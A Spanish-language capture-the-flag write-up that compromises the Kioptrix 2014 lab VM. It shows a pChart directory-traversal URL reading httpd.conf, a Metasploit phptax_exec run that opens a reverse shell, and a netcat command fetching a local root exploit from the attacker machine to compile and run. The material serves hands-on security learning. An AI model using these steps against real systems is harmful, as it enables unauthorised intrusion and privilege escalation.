SOLUCION KIPTRIX 2014 propuesto en SEC-TRACK.COM BY #KAGUREZAMA

Después de descargar el tar.bz2 procedo a comprobar el archivo antes de extraerlo asígarantizamos que no se halla dañado o modificado en la descarga.

Una vez extraído para estos casos problemáticos en que no me salen las cosas en virtualbox tengoel VMware player que es por decirlo de alguna manera un reproductor de máquinas virtuales sinrecurrir a la piratería que llaman porque no me puedo costear una licencia del Workstation o unosimilar

La abro y miro las configuraciones doy play y listo inicia la máquina para la diversión.

Tuve que quitar la tarjeta de red y crear otra y la deje en modo puente porque me es más cómodopara mí. Aclaro que al comienzo tenia la ip 192.168.2.101 pero luego de un reinicio quedo la192.168.2.104

Lanzo un nmap 192.168.2.1-254 que es el segmento donde está el lab para estos menesteres .

Solo tiene el puerto 80 abierto y el 8080 asi que todo esta encaminado a un reto web segúnparece.

Esto aparece en los dos puertos al entrar con el navegador. Asi que para ver que sucede hago unapetición en raw con el netcat al 8080 y me contesta lo mismo el server, forbidden .

YA sabiendo que es un reto web le lanzo en nikto para intentar descubrir algo me de pistas pordonde debo seguir as que primero voy por el puerto 80 y luego lo hare por el puerto 8080.

Pues no hay mucho ya que la supuesta vulnerabilidad en el mod ssl no es tal en esta versión sobrefreebsd. En el 8080 paso algo muy raro pues lance el nikto –h 192.168.2.101 –port 8080 y laverdad demoro más de lo normal sin dar resultado alguno antes de aventurarme mas alla volvi ael puerto 80 donde está el texto It works! Y vi el código fuente de la web y esto fue lo que meapareció, esto es como el cuento de Hansel y Gretel dejan las migas y uno las sigue, ingreso a laurl que esta comentada y me encuentro un bonito navegador de archivos

<html><head><!--<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">-->

</head>

<body><h1>It works!</h1>

</body></html>

Como se imaginaran lo primero que se me ocurrió después de ver esto fue buscar exploits para laaplicación BUSQUEDA exploits pchart2.1.3, dice el dicho si esta hay es por algo, en la búsquedaencontré este http://es.1337day.com/exploit/21805 que fue el que me sirvió intente como dice elexploit hacerme con los usuarios y su hash para haber si tenía acceso de esta forma pero no mefue posible, luego se me iluminó el foco e intente sacar la configuración del apache para ver porque no me dejaba ver nada en el puert 8080 pero después de mucho rato de frustración por nopoder obtenerlo me acorde que esto no era un Linux si no un freebsd cosa que cambia las cosas.Busco en google BUSQUEDA losg apache freebsd por que losg y no conf por que mi idea incial eraver que estaba pasando con el apache pero vueltas da rápidamente la fuerza diría un viejoconocido jedi ,y esta web me ayudo http://www.codeasite.com/index.php/linux-a-apache/94-how-do-i-find-apache-http-server-log-files

Empieso a crear la consulta y obtengo por fin los siguiente

http://192.168.2.101/pChart2.1.3/examples/?Action=View&Script=/../../../usr/local/etc/apache22/httpd.conf he resaltado la configuracion que hay al final del archivo donde se especifica que solosi se viene con un user agent como el siguiente se puede ver el contenido Allow fromenv=Mozilla4_browser

## This is the main Apache HTTP server configuration file. It contains the# configuration directives that give the server its instructions.# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.# In particular, see# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html># for a discussion of each configuration directive.#

# Do NOT simply read the instructions in here without understanding# what they do. They're here only as hints or reminders. If you are unsure# consult the online docs. You have been warned.## Configuration and logfile names: If the filenames you specify for many# of the server's control files begin with "/" (or "drive:/" for Win32), the# server will use that explicit path. If the filenames do *not* begin# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"# with ServerRoot set to "/usr/local" will be interpreted by the# server as "/usr/local//var/log/foo_log".

## ServerRoot: The top of the directory tree under which the server's# configuration, error, and log files are kept.## Do not add a slash at the end of the directory path. If you point# ServerRoot at a non-local disk, be sure to point the LockFile directive# at a local disk. If you wish to share the same ServerRoot for multiple# httpd daemons, you will need to change at least LockFile and PidFile.#ServerRoot "/usr/local"

## Listen: Allows you to bind Apache to specific IP addresses and/or# ports, instead of the default. See also the <VirtualHost># directive.## Change this to Listen on specific IP addresses as shown below to# prevent Apache from glomming onto all bound IP addresses.##Listen 12.34.56.78:80Listen 80Listen 8080## Dynamic Shared Object (DSO) Support## To be able to use the functionality of a module which was built as a DSO you# have to place corresponding `LoadModule' lines at this location so the# directives contained in it are actually available _before_ they are used.# Statically compiled modules (those listed by `httpd -l') do not need# to be loaded here.## Example:# LoadModule foo_module modules/mod_foo.so#LoadModule authn_file_module libexec/apache22/mod_authn_file.soLoadModule authn_dbm_module libexec/apache22/mod_authn_dbm.soLoadModule authn_anon_module libexec/apache22/mod_authn_anon.so

LoadModule authn_default_module libexec/apache22/mod_authn_default.soLoadModule authn_alias_module libexec/apache22/mod_authn_alias.soLoadModule authz_host_module libexec/apache22/mod_authz_host.soLoadModule authz_groupfile_module libexec/apache22/mod_authz_groupfile.soLoadModule authz_user_module libexec/apache22/mod_authz_user.soLoadModule authz_dbm_module libexec/apache22/mod_authz_dbm.soLoadModule authz_owner_module libexec/apache22/mod_authz_owner.soLoadModule authz_default_module libexec/apache22/mod_authz_default.soLoadModule auth_basic_module libexec/apache22/mod_auth_basic.soLoadModule auth_digest_module libexec/apache22/mod_auth_digest.soLoadModule file_cache_module libexec/apache22/mod_file_cache.soLoadModule cache_module libexec/apache22/mod_cache.soLoadModule disk_cache_module libexec/apache22/mod_disk_cache.soLoadModule dumpio_module libexec/apache22/mod_dumpio.soLoadModule reqtimeout_module libexec/apache22/mod_reqtimeout.soLoadModule include_module libexec/apache22/mod_include.soLoadModule filter_module libexec/apache22/mod_filter.soLoadModule charset_lite_module libexec/apache22/mod_charset_lite.soLoadModule deflate_module libexec/apache22/mod_deflate.soLoadModule log_config_module libexec/apache22/mod_log_config.soLoadModule logio_module libexec/apache22/mod_logio.soLoadModule env_module libexec/apache22/mod_env.soLoadModule mime_magic_module libexec/apache22/mod_mime_magic.soLoadModule cern_meta_module libexec/apache22/mod_cern_meta.soLoadModule expires_module libexec/apache22/mod_expires.soLoadModule headers_module libexec/apache22/mod_headers.soLoadModule usertrack_module libexec/apache22/mod_usertrack.soLoadModule unique_id_module libexec/apache22/mod_unique_id.soLoadModule setenvif_module libexec/apache22/mod_setenvif.soLoadModule version_module libexec/apache22/mod_version.soLoadModule ssl_module libexec/apache22/mod_ssl.soLoadModule mime_module libexec/apache22/mod_mime.soLoadModule dav_module libexec/apache22/mod_dav.soLoadModule status_module libexec/apache22/mod_status.soLoadModule autoindex_module libexec/apache22/mod_autoindex.soLoadModule asis_module libexec/apache22/mod_asis.soLoadModule info_module libexec/apache22/mod_info.soLoadModule cgi_module libexec/apache22/mod_cgi.soLoadModule dav_fs_module libexec/apache22/mod_dav_fs.soLoadModule vhost_alias_module libexec/apache22/mod_vhost_alias.soLoadModule negotiation_module libexec/apache22/mod_negotiation.soLoadModule dir_module libexec/apache22/mod_dir.soLoadModule imagemap_module libexec/apache22/mod_imagemap.soLoadModule actions_module libexec/apache22/mod_actions.soLoadModule speling_module libexec/apache22/mod_speling.soLoadModule userdir_module libexec/apache22/mod_userdir.soLoadModule alias_module libexec/apache22/mod_alias.soLoadModule rewrite_module libexec/apache22/mod_rewrite.so

LoadModule php5_module libexec/apache22/libphp5.so

<IfModule !mpm_netware_module><IfModule !mpm_winnt_module>## If you wish httpd to run as a different user or group, you must run# httpd as root initially and it will switch.## User/Group: The name (or #number) of the user/group to run httpd as.# It is usually good practice to create a dedicated user and group for# running httpd, as with most system services.#User wwwGroup www

</IfModule></IfModule>

# 'Main' server configuration## The directives in this section set up the values used by the 'main'# server, which responds to any requests that aren't handled by a# <VirtualHost> definition. These values also provide defaults for# any <VirtualHost> containers you may define later in the file.## All of these directives may appear inside <VirtualHost> containers,# in which case these default settings will be overridden for the# virtual host being defined.#

## ServerAdmin: Your address, where problems with the server should be# e-mailed. This address appears on some server-generated pages, such# as error documents. e.g. admin@your-domain.com#ServerAdmin you@example.com

## ServerName gives the name and port that the server uses to identify itself.# This can often be determined automatically, but we recommend you specify# it explicitly to prevent problems during startup.## If your host doesn't have a registered DNS name, enter its IP address here.##ServerName www.example.com:80

## DocumentRoot: The directory out of which you will serve your

# documents. By default, all requests are taken from this directory, but# symbolic links and aliases may be used to point to other locations.#DocumentRoot "/usr/local/www/apache22/data"

## Each directory to which Apache has access can be configured with respect# to which services and features are allowed and/or disabled in that# directory (and its subdirectories).## First, we configure the "default" to be a very restrictive set of# features.#<Directory />

AllowOverride NoneOrder deny,allowDeny from all

</Directory>

## Note that from this point forward you must specifically allow# particular features to be enabled - so if something's not working as# you might expect, make sure that you have specifically enabled it# below.#

## This should be changed to whatever you set DocumentRoot to.#<Directory "/usr/local/www/apache22/data">

## Possible values for the Options directive are "None", "All",# or any combination of:# Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews## Note that "MultiViews" must be named *explicitly* --- "Options All"# doesn't give it to you.## The Options directive is both complicated and important. Please see# http://httpd.apache.org/docs/2.2/mod/core.html#options# for more information.#Options Indexes FollowSymLinks

## AllowOverride controls what directives may be placed in .htaccess files.# It can be "All", "None", or any combination of the keywords:# Options FileInfo AuthConfig Limit

#AllowOverride None

## Controls who can get stuff from this server.#

Order allow,denyAllow from all

</Directory>

## DirectoryIndex: sets the file that Apache will serve if a directory# is requested.#<IfModule dir_module>

DirectoryIndex index.php index.html</IfModule>

## The following lines prevent .htaccess and .htpasswd files from being# viewed by Web clients.#<FilesMatch "^\.ht">

Order allow,denyDeny from allSatisfy All

</FilesMatch>

## ErrorLog: The location of the error log file.# If you do not specify an ErrorLog directive within a <VirtualHost># container, error messages relating to that virtual host will be# logged here. If you *do* define an error logfile for a <VirtualHost># container, that host's errors will be logged there and not here.#ErrorLog "/var/log/httpd-error.log"

## LogLevel: Control the number of messages logged to the error_log.# Possible values include: debug, info, notice, warn, error, crit,# alert, emerg.#LogLevel warn

<IfModule log_config_module>## The following directives define some format nicknames for use with

# a CustomLog directive (see below).#LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combinedLogFormat "%h %l %u %t \"%r\" %>s %b" common

<IfModule logio_module># You need to enable mod_logio.c to use %I and %OLogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O"

combinedio</IfModule>

## The location and format of the access logfile (Common Logfile Format).# If you do not define any access logfiles within a <VirtualHost># container, they will be logged here. Contrariwise, if you *do*# define per-<VirtualHost> access logfiles, transactions will be# logged therein and *not* in this file.##CustomLog "/var/log/httpd-access.log" common

## If you prefer a logfile with access, agent, and referer information# (Combined Logfile Format) you can use the following directive.#CustomLog "/var/log/httpd-access.log" combined

</IfModule>

<IfModule alias_module>## Redirect: Allows you to tell clients about documents that used to# exist in your server's namespace, but do not anymore. The client# will make a new request for the document at its new location.# Example:# Redirect permanent /foo http://www.example.com/bar

## Alias: Maps web paths into filesystem paths and is used to# access content that does not live under the DocumentRoot.# Example:# Alias /webpath /full/filesystem/path## If you include a trailing / on /webpath then the server will# require it to be present in the URL. You will also likely# need to provide a <Directory> section to allow access to# the filesystem path.

## ScriptAlias: This controls which directories contain server scripts.

# ScriptAliases are essentially the same as Aliases, except that# documents in the target directory are treated as applications and# run by the server when requested rather than as documents sent to the# client. The same rules about trailing "/" apply to ScriptAlias# directives as to Alias.#ScriptAlias /cgi-bin/ "/usr/local/www/apache22/cgi-bin/"

</IfModule>

<IfModule cgid_module>## ScriptSock: On threaded servers, designate the path to the UNIX# socket used to communicate with the CGI daemon of mod_cgid.##Scriptsock /var/run/cgisock

</IfModule>

## "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased# CGI directory exists, if you have that configured.#<Directory "/usr/local/www/apache22/cgi-bin">

AllowOverride NoneOptions NoneOrder allow,denyAllow from all

</Directory>

## DefaultType: the default MIME type the server will use for a document# if it cannot otherwise determine one, such as from filename extensions.# If your server contains mostly text or HTML documents, "text/plain" is# a good value. If most of your content is binary, such as applications# or images, you may want to use "application/octet-stream" instead to# keep browsers from trying to display binary files as though they are# text.#DefaultType text/plain

<IfModule mime_module>## TypesConfig points to the file containing the list of mappings from# filename extension to MIME-type.#TypesConfig etc/apache22/mime.types

#

# AddType allows you to add to or override the MIME configuration# file specified in TypesConfig for specific file types.##AddType application/x-gzip .tgz## AddEncoding allows you to have certain browsers uncompress# information on the fly. Note: Not all browsers support this.##AddEncoding x-compress .Z#AddEncoding x-gzip .gz .tgz## If the AddEncoding directives above are commented-out, then you# probably should define those extensions to indicate media types:#AddType application/x-compress .ZAddType application/x-gzip .gz .tgz

## AddHandler allows you to map certain file extensions to "handlers":# actions unrelated to filetype. These can be either built into the server# or added with the Action directive (see below)## To use CGI scripts outside of ScriptAliased directories:# (You will also need to add "ExecCGI" to the "Options" directive.)##AddHandler cgi-script .cgi

# For type maps (negotiated resources):#AddHandler type-map var

## Filters allow you to process content before it is sent to the client.## To parse .shtml files for server-side includes (SSI):# (You will also need to add "Includes" to the "Options" directive.)##AddType text/html .shtml#AddOutputFilter INCLUDES .shtml

AddType application/x-httpd-php .phpAddType application/x-httpd-php-source .phps

</IfModule>

## The mod_mime_magic module allows the server to use various hints from the# contents of the file itself to determine its type. The MIMEMagicFile# directive tells the module where the hint definitions are located.

##MIMEMagicFile etc/apache22/magic

## Customizable error responses come in three flavors:# 1) plain text 2) local redirects 3) external redirects## Some examples:#ErrorDocument 500 "The server made a boo boo."#ErrorDocument 404 /missing.html#ErrorDocument 404 "/cgi-bin/missing_handler.pl"#ErrorDocument 402 http://www.example.com/subscription_info.html#

## MaxRanges: Maximum number of Ranges in a request before# returning the entire resource, or 0 for unlimited# Default setting is to accept 200 Ranges#MaxRanges 0

## EnableMMAP and EnableSendfile: On systems that support it,# memory-mapping or the sendfile syscall is used to deliver# files. This usually improves server performance, but must# be turned off when serving from networked-mounted# filesystems or if support for these functions is otherwise# broken on your system.##EnableMMAP off#EnableSendfile off

# Supplemental configuration## The configuration files in the etc/apache22/extra/ directory can be# included to add extra features or to modify the default configuration of# the server, or you may simply copy their contents here and change as# necessary.

# Server-pool management (MPM specific)#Include etc/apache22/extra/httpd-mpm.conf

# Multi-language error messages#Include etc/apache22/extra/httpd-multilang-errordoc.conf

# Fancy directory listings#Include etc/apache22/extra/httpd-autoindex.conf

# Language settings

#Include etc/apache22/extra/httpd-languages.conf

# User home directories#Include etc/apache22/extra/httpd-userdir.conf

# Real-time info on requests and configuration#Include etc/apache22/extra/httpd-info.conf

# Virtual hosts#Include etc/apache22/extra/httpd-vhosts.conf

# Local access to the Apache HTTP Server Manual#Include etc/apache22/extra/httpd-manual.conf

# Distributed authoring and versioning (WebDAV)#Include etc/apache22/extra/httpd-dav.conf

# Various default settings#Include etc/apache22/extra/httpd-default.conf

# Secure (SSL/TLS) connections#Include etc/apache22/extra/httpd-ssl.conf## Note: The following must must be present to support# starting without SSL on platforms with no /dev/random equivalent# but a statically compiled-in mod_ssl.#<IfModule ssl_module>SSLRandomSeed startup builtinSSLRandomSeed connect builtin</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">Options Indexes FollowSymLinksAllowOverride AllOrder allow,denyAllow from env=Mozilla4_browser

</Directory>

</VirtualHost>

Include etc/apache22/Includes/*.conf

Ya sabiendo que se necesita un user agent especial para entrar en el puerto 8080 entro desde elnavegador ya habiendo cambiado el user agent con la extensión User Agent Switcher eniceweasel un fork del Firefox coloco el user agent que está en el archivo de configuración deapache sacado con la vulnerabilidad de pchart que permite acceder a archivos del sistema (Thetraversal is executed with the web server's privilege and leadstosensitive file disclosure (passwd, siteconf.inc.php or similar),accessto source codes, hardcoded passwords or other high impactconsequences,depending on the web server's configuration.This problem may exists inthe production code if the example code wascopied into the production

environment.) y funciona de maravillas claro que si alguien necesita casi todos lo user agentsexistentes aquí una lista compatible con la extensiónhttp://techpatterns.com/forums/about304.html

Quedando el user agente asi

Ingreso a http://192.168.2.101:8080/ y me encuentro un bonito index of.

Doy click en phptax y me encuentro con otra aplicación web.

Y en entro en un loop de nuevo a buscar un exploit para la aplicación si existe en caso talque o a buscarle el quiebre por mi mismo, pero se supone que dejan las aplicacoines queson vulnerables (“solo en retos generalmente”) asi que a buscar entro en exploit-db.com ytras una búsqueda encuentro tres exploits http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=phptax&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=

Hay tres de los cuales solo me sirvió el último. Pero para facilitarme la vida hice la mismabúsqueda en el metasploit ya que si esta en exploit-db es probable que este incluido en elmetasploit que viene con el kali Linux primero abro el metasploit con

Espero… y oooo! grata sorpresa veo que si hay algo y por ende puede ahorrarnos bastantetrabajo.

Aquí le doy las opciones y exploto

Exploit target:

Id Name-- ----0 PhpTax 0.8

msf exploit(phptax_exec) > set RHOST 192.168.2.101RHOST => 192.168.2.101msf exploit(phptax_exec) > set RPORT 8080RPORT => 8080

msf exploit(phptax_exec) > set TARGETURI /phptax/TARGETURI => /phptax/msf exploit(phptax_exec) > exploit

[*] Started reverse double handler[*] 192.168.2.1018080 - Sending request...[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo COI4EJBmKDBPQWpz;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket B[*] B: "COI4EJBmKDBPQWpz\r\n"[*] Matching...[*] A is input...[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo iilQukosvYD6jxe6;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "iilQukosvYD6jxe6\r\n"[*] Command shell session 1 opened (192.168.2.104:4444 -> 192.168.2.101:58131) at2014-04-14 00:23:49 -0500

Primero hago un ls a ver que hay en el directorio donde estoy luego un uname –a para saberque versión de freebsd es.

lsdatadrawimage.phpfilesicons.incindex.phpmapspicturesreadmettfuname -aFreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64Lue un ls al directorio /root y veo lo que me interesa la bandera por decirlo de algún modocongrats.txt alverlo intento leerlo cat /root/congrats.txt y hasta ahí llega mi felicidad me unlindo y frustrante permiso denegado lo cual quiere decir que solo root tiene acceso a ese

archivo pero teniendo la versión del freebsd solo resta buscar algún exploit para ganarprivilegios de root.

ls /rootcongrats.txtfolderMonitor.loghttpd-access.loglazyClearLog.shmonitor.pyossec-alerts.logcat /root/congrats.txtcat: /root/congrats.txt: Permission denied

Una vez más metasploit me mostro que si había uno disponible para versión nueve perosolo para ejecución local y vino mi problema porque no tenía forma de bajar nada alservidor no podía ejecutar cosas básicas como wget curl ni php ni python ni nano ni vi, asique por ser local debía arreglármelas para subir lo que necesito el código del exploit paracompilarlo y ejecutarlo.

Se me ocurrio que si corria apps hechas en php podría hacer un uploader y listo asi que hicemi primera prueba que fue el clásico hola hola.php fui al navegador puse la dir y siiiiiiii!!!

Asi que como no soy muy diestro en php me copie el código de esta webhttp://www.w3schools.com/php/php_file_upload.asp con el código tuve problemas con laetiqueta <br > entonces solo la quite y me dejo crear el archivo upload_file.php

Pero después de mucho probar esta solución no me quiso andar asi que la deje aquí comomera anécdota.

Y volvi al origen intentar pasar mi exploit descargado de aquí http://www.exploit-db.com/exploits/26368/ a la maquina remota osea al target para poder rootearla (ganaracceso con privilegios del dios alias root) entre todo lo único que jamas se me habíaocurrido probar era el netcat pero grata fue mi sorpresa cuando al poner nc me arroja esto.

Así que se me ocurrió descargar mi exploit desde netcat. En kali Linux es muy sencillosiguiendo el proceso con el mouse se pone en marcha el apache.

Renombre mí el exploit descargado a root.c y lo coloque en /var/www/root.c en la maquinakali ósea “la del atacante” y luego desde el target ejecute el siguiente comando nc192.168.105 80 >root.c e hice una petición GET /root.c HTTP/1.0 doble enter

Enseguida hice un cat root.c y había pasado, solo que con un pequeño error me agrego lascabeceras http al exploit en c y por ende no me lo iba a dejar compilar pero pues nada queno se pueda sortear en sistemas *nix solo me hizo falta hacer un tail –n 89 root.c >final.c yquedo listo para compilar

Aquí solo fue compilar el exploit y ejecutarlo la opción gcc final.c –o root

Con el comando id veo que ya no soy el usuario www si no que ahora soy root y vuelvo aintentar leer el mensaje que se halla en la carpeta home del usuario ySIIIIIIIIIIIIIIIIIIIIIIIIII!!! Lo he logrado!!! Adjunto el contenido del archivo congrats.txt

If you are reading this, it means you got root (or cheated).Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner inmind, and not meant for the seasoned pentester. However this does not mean onecan't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to alsolearn the basics skills needed to compromise a system. Most importantly, in my mind,are information gathering & research. Anyone can throw massive amounts ofexploitsand "hope" it works, but think about the traffic.. the logs... Best to take itslow, and read up on the information you gathered and hopefully craft bettermore targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.Knowing the OS gives you any idea of what will work and what won't from the getgo.Default file locations are not the same on FreeBSD versus a Linux based distribution.Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".It's default document root is not "/var/www/" but in"/usr/local/www/apache22/data".Finding and knowing these little details will greatly help during an attack. Of coursemy examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of coursethe log results may not be accurate if you created a snapshot and reverted, but at

leastit will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a fewthings.Default settings, nothing fancy but it should've logged a few of your attacks. Lookat the following files:/root/folderMonitor.log/root/httpd-access.log (softlink)/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted andmodifiedfiles in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't useOSSEC-HIDSfor this.The httpd-access.log is rather self-explanatory .Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts whenmonitoring certainfiles. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.And again, thank you for taking the time to download and play.Sincerely hope you enjoyed yourself.

Be good...

loneferrethttp://www.kioptrix.com

p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, bydefault it would've blocked your IP (both in hosts.allow & Firewall) for600 seconds. I was nice enough to remove that part :)

Como reflexión decir que no dejen de insistir en sus planes de aprendizaje con este tipo deretos que enseñanzas dejan siempre asi como dolores de cabeza que un dia te pueden servir.

Gracias por leer y me perdonaran las faltas ortográficas y demás errores que puedan haberen el documento.